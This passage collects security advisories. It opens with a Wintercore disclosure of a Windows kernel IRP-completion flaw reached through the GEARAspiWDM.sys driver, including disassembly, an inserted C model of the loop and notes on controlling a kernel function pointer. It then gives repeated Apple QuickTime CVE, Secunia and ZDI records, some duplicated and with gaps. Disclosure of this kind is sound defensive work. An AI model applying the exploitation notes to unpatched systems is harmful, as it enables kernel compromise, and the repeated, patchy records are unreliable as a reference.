3. Vulnerable Products: Every GearSoftware powered product that is bundled with GEARAspiWDM.sys (e.g. Norton 360, Apple iTunes...).

Whilst the underlying vulnerability is, in our view, a real vulnerability, the Attack Vector may or may not be considered a vulnerability by itself. Note that if we remove the underlying vulnerability from the equation, the attack vector turns out to be practically useless; however, by patching only the attack vector we will always face the risk that another one comes to light. On the other hand, this is not impossible but seems very unlikely.

Microsoft, as the vendor affected by the underlying vulnerability, and Apple and Symantec, as vendors of Vulnerable Products, were directly contacted. After verifying the details provided, Microsoft did not consider this flaw eligible for a patch. Therefore, with the help of the US-CERT, Symantec, Apple, GearSoftware and Wintercore coordinated the process of resolving this issue by patching the GEARAspiWDM.sys driver. The final outcome is that the Attack Vector has been patched although the underlying vulnerability still remains unpatched.

3. Technical Description

The problem lies in how the stack locations are traversed while trying to complete an IRP.
Let's see:

lkd> dt nt!_IRP
[...]
   +0x022 StackCount       : Char   *signed*
   +0x023 CurrentLocation  : Char   *signed*
[...]

Module: ntoskrnl.exe  Version: XP SP2

.text:0040CC01
.text:0040CC01 ; __fastcall IopfCompleteRequest(x, x)
.text:0040CC01 @IopfCompleteRequest@8 proc near        ; CODE XREF: IoPerfCompleteRequest(x,x)+88p
.text:0040CC01                                         ; IoPerfCompleteRequest(x,x)+B8p ...
.text:0040CC01
.text:0040CC01 var_C = dword ptr -0Ch
.text:0040CC01 var_8 = dword ptr -8
.text:0040CC01 var_1 = byte ptr -1
.text:0040CC01
.text:0040CC01 mov     edi, edi
.text:0040CC03 push    ebp
.text:0040CC04 mov     ebp, esp
.text:0040CC06 sub     esp, 10h
.text:0040CC09 push    ebx
.text:0040CC0A push    esi
.text:0040CC0B mov     esi, ecx
.text:0040CC0D mov     cl, [esi+23h]       ; Irp->CurrentLocation
.text:0040CC10 mov     [ebp+var_8], edx
.text:0040CC13 mov     dl, [esi+22h]       ; Irp->StackCount
.text:0040CC16 xor     ebx, ebx
.text:0040CC18 inc     dl                  ; Irp->StackCount+1
.text:0040CC1A cmp     cl, dl
.text:0040CC1C push    edi
.text:0040CC1D mov     [ebp+var_C], ebx
.text:0040CC20 jg      sub_444F81
.text:0040CC26 cmp     word ptr [esi], 6   ; Irp->Type == IO_TYPE_IRP
.text:0040CC2A jnz     sub_444F81
.text:0040CC30 mov     edi, [esi+60h]      ; Irp->CurrentStackLocation
.text:0040CC33 inc     cl
.text:0040CC35 cmp     cl, dl
.text:0040CC37 lea     eax, [edi+24h]
.text:0040CC3A mov     [esi+23h], cl       ; Irp->CurrentLocation++
.text:0040CC3D mov     [esi+60h], eax      ; Irp->Tail.Overlay.CurrentStackLocation++
.text:0040CC40 jg      short loc_40CCA6
.text:0040CC42 add     edi, 3
{...}
.text:0040CC8D
.text:0040CC8D loc_40CC8D:                             ; CODE XREF: IopfCompleteRequest(x,x)+13Cj
.text:0040CC8D add     dword ptr [esi+60h], 24h ; StackLocation++
.text:0040CC91 mov     eax, [esi+60h]
.text:0040CC94 add     edi, 24h            ; Irp->Tail.Overlay.CurrentStackLocation++
.text:0040CC97 inc     byte ptr [esi+23h]  ; Irp->CurrentLocation++
.text:0040CC9A mov     dl, [esi+22h]       ; Irp->StackCount
.text:0040CC9D mov     cl, [esi+23h]       ; Irp->CurrentLocation
.text:0040CCA0 inc     dl
.text:0040CCA2 cmp     cl, dl              ; if CurrentLocation <= StackCount+1
.text:0040CCA4 jle     short loc_40CC45    ; Signed comparison - FLAW -

pStack = IoGetCurrentIrpStackLocation( Irp );

for( pStack, Irp->Tail.Overlay.CurrentStackLocation++, Irp->CurrentLocation++;
     Irp->CurrentLocation <= (CHAR) (Irp->StackCount + 1);
     pStack++, Irp->Tail.Overlay.CurrentStackLocation++, Irp->CurrentLocation++ )
{
    ...
}

Well, let's imagine an IRP where StackCount == CurrentLocation == 0x7e (pretty unusual, but possible indeed). After the first iteration within the for(){...}, CurrentLocation will be 0x80, which is a negative value, so Irp->CurrentLocation <= (CHAR)(Irp->StackCount + 1) becomes TRUE. Hence, the remaining iterations will run outside the allocated memory, traversing arbitrary and invalid stack locations.

4. Exploiting it

Digging into the for{} loop we found out the following:

Module: ntoskrnl.exe  XP SP2 (32-bit)

.text:0040CD30 loc_40CD30:                             ; CODE XREF: IopfCompleteRequest(x,x)+4B47j
.text:0040CD30 push    dword ptr [edi+1Dh]
.text:0040CD33 push    esi
.text:0040CD34 push    eax
.text:0040CD35 call    dword ptr [edi+19h]
.text:0040CD38 cmp     eax, 0C0000016h
.text:0040CD3D jnz     loc_40CC8D          ; StackLocation++

pStack->CompletionRoutine(...)

We must note that once the flaw has been triggered, the for{} loop is traversing invalid stack locations where *(edi+19h) points to undetermined memory. We also have to take into account the internals of the IO Manager, where the memory allocated for IRPs is zeroed. Therefore, it has been proven that by allocating user-mode memory at 0x0 we can control the function pointer dereferenced. However, that's not always true, since we may be traversing uninitialized memory that holds random values. For those cases, it is also possible to seed the memory by issuing FSCTL/IOCTL requests before triggering the flaw, thus ensuring high reliability when exploiting this flaw. Anyway, the hardest task is to discover a suitable attack vector, since you need to force a huge driver stack.
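An added example, not code from the Wintercore advisory or from Microsoft: a user-mode C model of the stack-location walk above, with the IRP reduced to the two 8-bit signed fields the loop compares. The irp_model and walk_model types and the walk_signed and walk_checked functions are the example's own names, and walk_checked is an illustrative int-width comparison, not Microsoft's fix (the advisory records that none was issued). It shows that StackCount == CurrentLocation == 0x7e keeps the 8-bit comparison loop running off the allocated locations, while the same values end after one location when compared at int width.

```c
/* Model of the IopfCompleteRequest stack-location walk from the advisory.
 * Added example: the IRP is reduced to the two fields the loop compares
 * (both 8-bit signed, as the dt nt!_IRP output shows) and the stack
 * locations to an index range, so the effect of the signed comparison can
 * be observed in user mode. irp_model/walk_model and the two walk_*
 * functions are this example's own names. */
#include <stdio.h>

#define MAX_ITER 1024   /* guard for the model only; the kernel loop has none */

typedef struct {
    signed char StackCount;      /* nt!_IRP +0x022, Char */
    signed char CurrentLocation; /* nt!_IRP +0x023, Char (1-based) */
} irp_model;

typedef struct {
    int iterations;    /* loop bodies executed */
    int out_of_bounds; /* bodies whose location lay outside 1..StackCount */
    int runaway;       /* 1 if MAX_ITER had to stop the walk */
} walk_model;

/* Is idx one of the StackCount allocated stack locations? */
static int in_bounds(int idx, int stack_count)
{
    return idx >= 1 && idx <= stack_count;
}

/* The loop exactly as the listing compares it: advance once in the prologue,
 * then continue while CurrentLocation <= (CHAR)(StackCount + 1). Both
 * operands are 8-bit signed, so CurrentLocation wraps from 0x7f to 0x80
 * (-128), the condition stays true and pStack walks past the allocation. */
walk_model walk_signed(signed char stack_count, signed char current)
{
    irp_model irp = { stack_count, current };
    walk_model r = { 0, 0, 0 };
    int p_stack = current;          /* location the body would complete */

    irp.CurrentLocation++;          /* prologue: inc cl */
    while (irp.CurrentLocation <= (signed char)(irp.StackCount + 1)) {
        if (r.iterations == MAX_ITER) {   /* the real loop would not stop */
            r.runaway = 1;
            break;
        }
        r.iterations++;
        if (!in_bounds(p_stack, irp.StackCount))
            r.out_of_bounds++;
        p_stack++;
        irp.CurrentLocation++;      /* 0x7f + 1 -> 0x80 == -128 */
    }
    return r;
}

/* Same walk with the comparison carried out in int, so StackCount + 1 and
 * the running index never wrap. Illustrative only: the advisory records
 * that Microsoft issued no kernel fix, so this is not their patch. */
walk_model walk_checked(signed char stack_count, signed char current)
{
    walk_model r = { 0, 0, 0 };
    int last = (int)stack_count + 1;   /* 127 for 0x7e, and stays 127 */
    int cur = (int)current + 1;        /* prologue advance, int width */
    int p_stack = current;

    while (cur <= last) {
        if (r.iterations == MAX_ITER) {
            r.runaway = 1;
            break;
        }
        r.iterations++;
        if (!in_bounds(p_stack, stack_count))
            r.out_of_bounds++;
        p_stack++;
        cur++;
    }
    return r;
}

static void report(const char *label, walk_model r)
{
    printf("%-22s iterations=%d out_of_bounds=%d runaway=%d\n",
           label, r.iterations, r.out_of_bounds, r.runaway);
}

int main(void)
{
    /* ordinary IRP: 5 locations, completing from location 3 */
    report("signed, 5/3", walk_signed(5, 3));
    /* the advisory's case: StackCount == CurrentLocation == 0x7e */
    report("signed, 0x7e/0x7e", walk_signed(0x7e, 0x7e));
    report("checked, 0x7e/0x7e", walk_checked(0x7e, 0x7e));
    return 0;
}
```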
The patched driver was found to implement an insecure method by which an unlimited number of calls to IoAttachDevice (TargetDevice is also user-controlled) were available from user-land, simply by issuing an IOCTL request. Since GEARAspiWDM.sys is signed on Vista 64-bit, it is possible to bypass certain kernel restrictions by exploiting this issue successfully.

The driver's insecure method is exposed via the following "free-for-all" device:

+ "\\.\GEARAspiWDMDevice"

The flaw lies within the handler for IOCTL == 0x222020.

Module: GEARAspiWDM.sys (32-bit)

.text:000114B2 loc_114B2:                              ; CODE XREF: sub_1137E+7Bj
.text:000114B2 cmp     [ebp+var_1], 0
.text:000114B6 jz      short loc_114CC
.text:000114B8 cmp     [edi+54h], ecx
.text:000114BB jz      short loc_114CC
.text:000114BD push    ebx
.text:000114BE mov     ecx, edi
.text:000114C0 call    sub_11CA2           ; IRP_MJ_DEVICE_CONTROL Dispatch Routine
{...}
.text:00011CA2 mov     eax, [esp+arg_0]
.text:00011CA6 mov     edx, [eax+60h]
.text:00011CA9 mov     edx, [edx+0Ch]
.text:00011CAC push    esi
.text:00011CAD mov     esi, 222010h
.text:00011CB2 cmp     edx, esi
.text:00011CB4 ja      short loc_11CF7
.text:00011CB6 jz      short loc_11CEF
.text:00011CB8 sub     edx, 222000h
.text:00011CBE jz      short loc_11CE7
{...}
.text:00011D10 loc_11D10:                              ; CODE XREF: sub_11CA2+65j
.text:00011D10 push    eax                 ; DeviceObject
.text:00011D11 call    sub_11B90
    ||
    \/
Module: GEARAspiWDM.sys (32-bit)

.text:00011B90 ; int __stdcall sub_11B90(PDEVICE_OBJECT DeviceObject)
.text:00011B90 sub_11B90 proc near                     ; CODE XREF: sub_11CA2+6Fp
.text:00011B90
.text:00011B90 TargetDevice = UNICODE_STRING ptr -10h
.text:00011B90 var_8 = dword ptr -8
.text:00011B90 var_4 = dword ptr -4
.text:00011B90 DeviceObject = dword ptr 8
.text:00011B90
.text:00011B90 push    ebp
.text:00011B91 mov     ebp, esp
.text:00011B93 sub     esp, 10h
.text:00011B96 mov     eax, [ebp+DeviceObject]
.text:00011B99 mov     eax, [eax+3Ch]
.text:00011B9C push    ebx
.text:00011B9D xor     ebx, ebx
.text:00011B9F cmp     eax, ebx
.text:00011BA1 push    edi
.text:00011BA2 mov     edi, ecx
.text:00011BA4 mov     [ebp+var_8], eax
.text:00011BA7 mov     [ebp+DeviceObject], ebx
.text:00011BAA jnz     short loc_11BB6
.text:00011BAC mov     eax, 0C000000Dh
.text:00011BB1 jmp     loc_11C9C
.text:00011BB6 ; ---------------------------------------------------------------------------
.text:00011BB6
.text:00011BB6 loc_11BB6:                              ; CODE XREF: sub_11B90+1Aj
.text:00011BB6 push    eax                 ; SourceString
.text:00011BB7 lea     eax, [ebp+TargetDevice]
.text:00011BBA push    eax                 ; DestinationString
.text:00011BBB call    ds:RtlInitUnicodeString
{...}
.text:00011C3E lea     edi, [esi+10h]
.text:00011C41 push    edi                 ; AttachedDevice
.text:00011C42 lea     eax, [ebp+TargetDevice]
.text:00011C45 push    eax                 ; TargetDevice ; user-controlled
.text:00011C46 push    [ebp+DeviceObject]  ; SourceDevice
.text:00011C49 call    ds:IoAttachDevice

5. References

GearSoftware Updated Drivers: http://www.gearsoftware.com/support/drivers.cfm
KB-CERT: http://www.kb.cert.org/vuls/id/146896
Symantec: http://www.symantec.com/avcenter/security/Content/2008.10.07a.html
Apple: http://support.apple.com/kb/HT3025

6. Affected Products

Product/File                              Vulnerable Version
GearAspiWDM.sys                           < 2.011.2 (32-bit)
                                          < 2.008.2.1 (64-bit)
Microsoft Windows Kernel                  All versions 32/64-bit
                                          + 2000
                                          + 2003
                                          + XP
                                          + Vista
Apple iTunes                              7.x
Symantec Norton 360                       2.0 and earlier
Symantec Norton Ghost                     14.0 and earlier
Symantec Norton Save and Restore          2.0 and earlier
Symantec Backup Exec System Recovery      6.x, 7.x and 8.x

7. Credits

Vulnerability discovered and researched by Ruben Santamarta, Wintercore.

8. Disclosure Timeline

11/14/2007 - Microsoft Contacted
12/26/2007 - Symantec Contacted
12/26/2007 - Apple Contacted
10/07/2008 - Coordinated Disclosure

9. Contact

Wintercore
Agustin de Betancourt, 21. 8th Floor.
28003 Madrid. Spain.
Phone: +(34) 91 395 63 40
contact (at) wintercore (dot) com
www.wintercore.com
VAR-200809-0202 CVE-2008-3629 Apple QuickTime PICT Denial of Service Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Apple QuickTime before 7.5.5 allows remote attackers to cause a denial of service (application crash) via a crafted PICT image that triggers an out-of-bounds read. Apple QuickTime is prone to a denial-of-service vulnerability. This issue arises when the application handles specially crafted PICT image files. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. NOTE: This issue was previously described in BID 31086 (Apple QuickTime Movie/PICT/QTVR Multiple Remote Vulnerabilities) but has been given its own record to better document the vulnerability. The following are vulnerable: QuickTime 7.5 and earlier; Apple TV 2.1 and earlier.

1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file.
2) A boundary error in QuickTimeInternetExtras.qtx when parsing files via the third-party Indeo3.2 codec for QuickTime can be exploited to cause a stack-based buffer overflow via a specially crafted movie file.
3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file.
4) A boundary error in the parsing of panorama PDAT atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

SOLUTION: Update to version 7.5.5.

QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.

ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744

----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200809-0197 CVE-2008-3624 Apple QuickTime QTVR movie file handling heap-based buffer overflow vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Heap-based buffer overflow in Apple QuickTime before 7.5.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a QuickTime Virtual Reality (QTVR) movie file with crafted panorama atoms. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details:
- CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability')
- CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability').
Apple QuickTime is a very popular multimedia player.

----------------------------------------------------------------------
We have updated our website, enjoy!
http://secunia.com/
----------------------------------------------------------------------

TITLE: Apple QuickTime Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA31821

VERIFY ADVISORY: http://secunia.com/advisories/31821/

CRITICAL: Highly critical
IMPACT: System access
WHERE: From remote

SOFTWARE: Apple QuickTime 7.x
http://secunia.com/advisories/product/5090/

DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system.

1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.

Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

SOLUTION: Update to version 7.5.5.

QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.

ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744
VAR-200809-0207 CVE-2008-3635 Indeo v3.2 codec used in Apple QuickTime on Windows stack-based buffer overflow vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in QuickTimeInternetExtras.qtx in an unspecified third-party Indeo v3.2 (aka IV32) codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of QuickTime files that utilize the Indeo video codec. A lack of proper bounds checking within QuickTimeInternetExtras.qtx can result in a stack-based buffer overflow leading to arbitrary code execution under the context of the currently logged-in user. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details:
- CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability')
- CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability').
Apple QuickTime is a very popular multimedia player.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster@3com.com.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

----------------------------------------------------------------------
TITLE: Apple QuickTime Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA31821

VERIFY ADVISORY: http://secunia.com/advisories/31821/

CRITICAL: Highly critical
IMPACT: System access
WHERE: From remote

SOFTWARE: Apple QuickTime 7.x
http://secunia.com/advisories/product/5090/

DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system.

1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file.
3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.

SOLUTION: Update to version 7.5.5.

QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.

ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744
VAR-200809-0189 CVE-2008-3615 Indeo v5 codec used in Apple QuickTime on Windows memory corruption vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
ir50_32.qtx in an unspecified third-party Indeo v5 codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, accesses uninitialized memory, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details:
- CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability')
- CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability').
Apple QuickTime is a very popular multimedia player.

----------------------------------------------------------------------
TITLE: Apple QuickTime Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA31821

VERIFY ADVISORY: http://secunia.com/advisories/31821/

CRITICAL: Highly critical
IMPACT: System access
WHERE: From remote

SOFTWARE: Apple QuickTime 7.x
http://secunia.com/advisories/product/5090/

DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system.

3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file.
4) A boundary error in the parsing of panorama PDAT atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.

Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

SOLUTION: Update to version 7.5.5.

QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.

ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744
VAR-200809-0198 CVE-2008-3625 Apple QuickTime panorama track PDAT atom handling stack-based buffer overflow vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in Apple QuickTime before 7.5.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a QuickTime Virtual Reality (QTVR) movie file with crafted (1) maxTilt, (2) minFieldOfView, and (3) maxFieldOfView elements in panorama track PDAT atoms. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in the handling of panorama track PDAT atoms. When the maxTilt, minFieldOfView and maxFieldOfView elements are corrupted, a stack buffer overflow occurs which can be further leveraged to execute arbitrary code under the context of the current user. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. Remote attackers can use specially constructed PICT pictures to cause program crashes and denial of service. This attack is related to null pointer assignment. ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-058 September 9, 2008 -- CVE ID: CVE-2008-3625 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6242. 
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-06-25 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
